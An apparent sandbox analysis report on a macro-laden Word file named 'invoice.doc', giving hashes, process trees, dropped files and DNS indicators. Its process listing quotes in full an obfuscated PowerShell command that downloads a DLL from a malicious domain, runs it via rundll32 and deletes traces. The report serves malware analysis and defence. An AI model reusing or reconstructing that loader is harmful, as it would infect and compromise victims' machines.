analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

invoice.doc

Full analysis: https://app.any.run/tasks/d6f50297-2505-4c78-bc90-31d6c4e2656f
Verdict: Malicious activity
Analysis date: November 08, 2018, 15:17:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

1374457044433A7AD196C1E43ACB15C1

SHA1:

98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE

SHA256:

B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7

SSDEEP:

6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Application was dropped or rewritten from another process

      • chaua.exe (PID: 456)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 968)
    • Loads dropped or rewritten executable

      • explorer.exe (PID: 1604)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • explorer.exe (PID: 1604)
    • Creates files in the user directory

      • explorer.exe (PID: 1604)
      • chaua.exe (PID: 456)
    • Uses RUNDLL32.EXE to load library

      • chaua.exe (PID: 456)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 1604)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Office Word 97-2003
CompObjUserTypeLen: 39
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:07 02:32:00
CreateDate: 2018:11:04 19:24:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: Windows User
Template: Normal.dotm
Keywords: -
Author: James Smith
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
10
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
drop and start start winword.exe chaua.exe no specs rundll32.exe no specs winword.exe explorer.exe no specs explorer.exe no specs notepad.exe no specs notepad.exe no specs winword.exe explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
968"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
456"C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew);C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2424"C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1C:\Windows\system32\rundll32.exechaua.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3048"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3808"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1604C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
328"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\WSMan.Format.ps1xmlC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2644"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xmlC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
700"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3416"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
8 693
Read events
6 921
Write events
0
Delete events
0

Modification events

No data
Executable files
41
Suspicious files
0
Text files
367
Unknown types
15

Dropped files

PID
Process
Filename
Type
968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA285.tmp.cvr
MD5:
SHA256:
1604explorer.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\invoice.doc.lnklnk
MD5:2690A5681567DDF993C464B15B242847
SHA256:4B56B17C8BE26FB9D7997CD5AA55F10814890EF4B3CFF8A6D5B84199812FB875
968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNKlnk
MD5:670E13493ECC1107BEDE395807B735EC
SHA256:8DC0C30BDAD2E63C836EBD9C88E6F5292AAAE04C8D9D4D26DE4D9172C4FAE9D8
968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:500A1C0AB1A05201CE7A192CDAABCA55
SHA256:E7DE924E3C3BFFF39C6664F77C25DE7E4F48206DCE9919BDB34F449698DD640B
1604explorer.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a7bd71699cd38d1c.automaticDestinations-msautomaticdestinations-ms
MD5:39B942AAF6246EE3F59E89E4623FD344
SHA256:AFC0B10BC338D9EF71151B91DDB11F8E6012D52B617423E9C9D7E009D35521B4
968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
968WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
1604explorer.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-msautomaticdestinations-ms
MD5:1F20E3676DBF3F0C1B16F8D2BE33E0A4
SHA256:3FA5AB55980D83E2B4879B0F1C8AECEC124F7E76490D0AFFFEF99373C25C2C49
968WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:59131AE46194C72AAA2801E1AD2642A0
SHA256:32C5BFAA5D065DD7FD36D9AD6A40361A8160F42BB4F98F164D4D8BCB0E92CEE3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
primetimer.org
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info